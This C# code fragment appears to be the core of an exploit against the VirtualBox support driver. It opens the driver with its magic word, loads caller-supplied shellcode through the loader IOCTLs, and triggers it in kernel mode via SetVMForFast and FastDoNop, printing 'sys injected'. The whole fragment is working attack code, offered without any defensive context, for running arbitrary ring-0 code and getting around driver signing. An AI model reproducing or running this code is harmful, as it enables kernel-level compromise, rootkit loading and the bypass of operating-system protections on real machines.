public static void Exploit(Byte[] shellcode, Int32 codeSize, Int32 dataOffset) { var connect = new ConnectIn { Header = new Header(BitConverter.ToUInt32(Encoding.Default.GetBytes("tori"), 0), 0, Marshal.SizeOf <ConnectIn>(), Marshal.SizeOf <ConnectOut>()) }; connect.RequestedVersion = 0; connect.InterfaceVersion = 0x00070002; Marshal.Copy(Encoding.Default.GetBytes("The Magic Word!").ToArray(), 0, new IntPtr(connect.MagicWord), 15); var cookie = Natives.DeviceIoControl <ConnectOut>(DeviceHandle, Connect, connect); if (cookie.Cookie == 0) { throw new Exception("Connect to VBox Failed"); } var ldrOp = new LdrOpIn { Header = Header.CreateHeader <LdrOpIn, LdrOpOut>(cookie), CodeSize = codeSize }; Marshal.Copy(Encoding.Default.GetBytes("shalzuth").ToArray(), 0, new IntPtr(ldrOp.NameTag), 8); var ldrOpOut = Natives.DeviceIoControl <LdrOpOut>(DeviceHandle, LoaderOpen, ldrOp); if (ldrOpOut.Header.Cookie == 0) { throw new Exception("Loader Open Failed"); } Console.WriteLine("ldrOpOut.ImageBase : " + ldrOpOut.ImageBase.ToString("X")); var imageBase = ldrOpOut.ImageBase; var ldrLd = new LdrLdIn { Header = Header.CreateHeader <LdrLdInWithPayload, Header>(cookie) }; ldrLd.EntryPointType = 1; //SUPLDRLOADEP_VMMR0 ldrLd.ImageBase = ldrLd.ModuleHandlerEntryEx = ldrLd.ModuleHandlerEntryFast = ldrLd.ModuleHandlerEntryInt = imageBase; ldrLd.ModuleHandler = 0x1a000; ldrLd.ImageSize = codeSize; var ldrLdWithPayload = new LdrLdInWithPayload { LdrLd = ldrLd }; Marshal.Copy(shellcode, 0, new IntPtr(ldrLdWithPayload.Payload), shellcode.Length); if (Natives.DeviceIoControl <Header>(DeviceHandle, LoaderLoad, ldrLdWithPayload).Cookie == 0) { throw new Exception("Loader Load Failed"); } var setVmForFast = new SetVMForFastIn { Header = Header.CreateHeader <SetVMForFastIn, Header>(cookie), Ring0VMPtr = 0x1a000 }; if (Natives.DeviceIoControl <Header>(DeviceHandle, SetVMForFast, setVmForFast).Cookie == 0) { throw new Exception("Set VM Failed"); } if (Natives.DeviceIoControl <UInt64>(DeviceHandle, FastDoNop, new NopIn()) != 0) { throw new Exception("Fast NOP Failed"); } Console.WriteLine("sys injected, freeing"); var ldrFree = new LdrFreeIn { Header = Header.CreateHeader <LdrFreeIn, Header>(cookie), ImageBase = imageBase }; if (Natives.DeviceIoControl <Header>(DeviceHandle, LoaderFree, ldrFree).Cookie == 0) { throw new Exception("Load Free Failed"); } }
public static Int32 IOCTL(Int32 Function) { return(Natives.CTL_CODE(Natives.FILE_DEVICE_UNKNOWN, (Function) | 0x80, Natives.CtlMethod.Buffered, 2)); }